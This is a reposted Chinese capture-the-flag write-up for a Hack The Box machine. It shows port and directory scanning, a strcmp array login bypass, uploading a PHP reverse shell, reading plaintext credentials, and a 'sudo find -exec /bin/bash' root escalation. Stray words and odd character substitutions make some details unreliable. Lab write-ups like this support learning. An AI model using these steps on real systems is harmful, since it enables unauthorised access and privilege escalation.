文章源自【字節脈搏社區】-字節脈搏實驗室 php
做者-whithtml
掃描下方二維碼進入社區:python
以後準備長期更新HTB系列,由易到難,開了VIP,全部靶機的思路都會更新,讓你們儘量多的學習到挖洞技巧,請你們持續關注我們的微信公衆號,字節脈搏實驗室。linux
首先掃描開放端口和服務。web
nmap -A -v 10.10.10.48shell
能夠看到開放端口是22和80,機器是linux的。瀏覽器
打開80端口對應的網站應用:安全
先上工具掃一波目錄:python3 dirsearch.py -u http://10.10.10.48 -e *bash
gobuster dir -u http://10.10.10.48 -w /usr/share/wordlists/dirb/big.txt服務器
爆破獲得有用的目錄爲:_uploaded login
直接訪問:http://10.10.10.48/login/
目錄配置錯誤,能夠直接列出。
在登陸文件夾中,咱們能夠看到login.php.swp。在Web服務器上就地編輯文件的狀況並很多見,若是未適當關閉文件,Nano和Vim等編輯器將建立臨時文件。咱們能夠下載.swp文件,並查看login.php使用strings命令的源代碼。
Web服務器正在使用strcmp來檢查用戶名和密碼,這是不安全的,能夠輕鬆地繞開。讓咱們打開burp並捕獲登陸請求。如下代碼存在問題:
if (strcmp($password, $_POST['password']) == 0) {
if (strcmp($username , $_POST['username']) == 0) {
Burp捕捉登錄請求,修改post的參數爲:username[]=admin&password[]=admin
順利登錄:
上傳kali自帶的php shell:/usr/share/webshells/php/php-reverse-shell.php
上傳以後沒文件路徑,加上以前掃描出來的目錄,瀏覽器訪問執行,本地監聽:http://10.10.10.48/_uploaded/php-reverse-shell.php
看一下web的配置文件:cat /var/www/html/login/config.php
<?php
$username = 「admin」;
$password = 「thisisaxxxxpassword」;
咱們還能夠閱讀/etc/passwd以找到用戶名john。結合這兩個。讓咱們升級到pty shell。
python -c 'import pty; pty.spawn(「/bin/bash」)'
su jhon
拿到user.txt
sudo -l
看來咱們能夠將find做爲sudo 運行。
sudo /usr/bin/find /etc -exec /bin/bash \;
拿到root.txt
剛開始分享一個比較基礎的靶機,以後會從慢慢深刻。長期更新,記得追更哦。
通知!
公衆號招募文章投稿小夥伴啦!只要你有技術有想法要分享給更多的朋友,就能夠參與到咱們的投稿計劃當中哦~感興趣的朋友公衆號首頁菜單欄點擊【商務合做-我要投稿】便可。期待你們的參與~
記得掃碼
關注咱們哦
本文分享自微信公衆號 - WhITECat安全團隊(WhITECat_007)。
若有侵權,請聯繫 support@oschina.cn 刪除。
本文參與「OSC源創計劃」,歡迎正在閱讀的你也加入,一塊兒分享。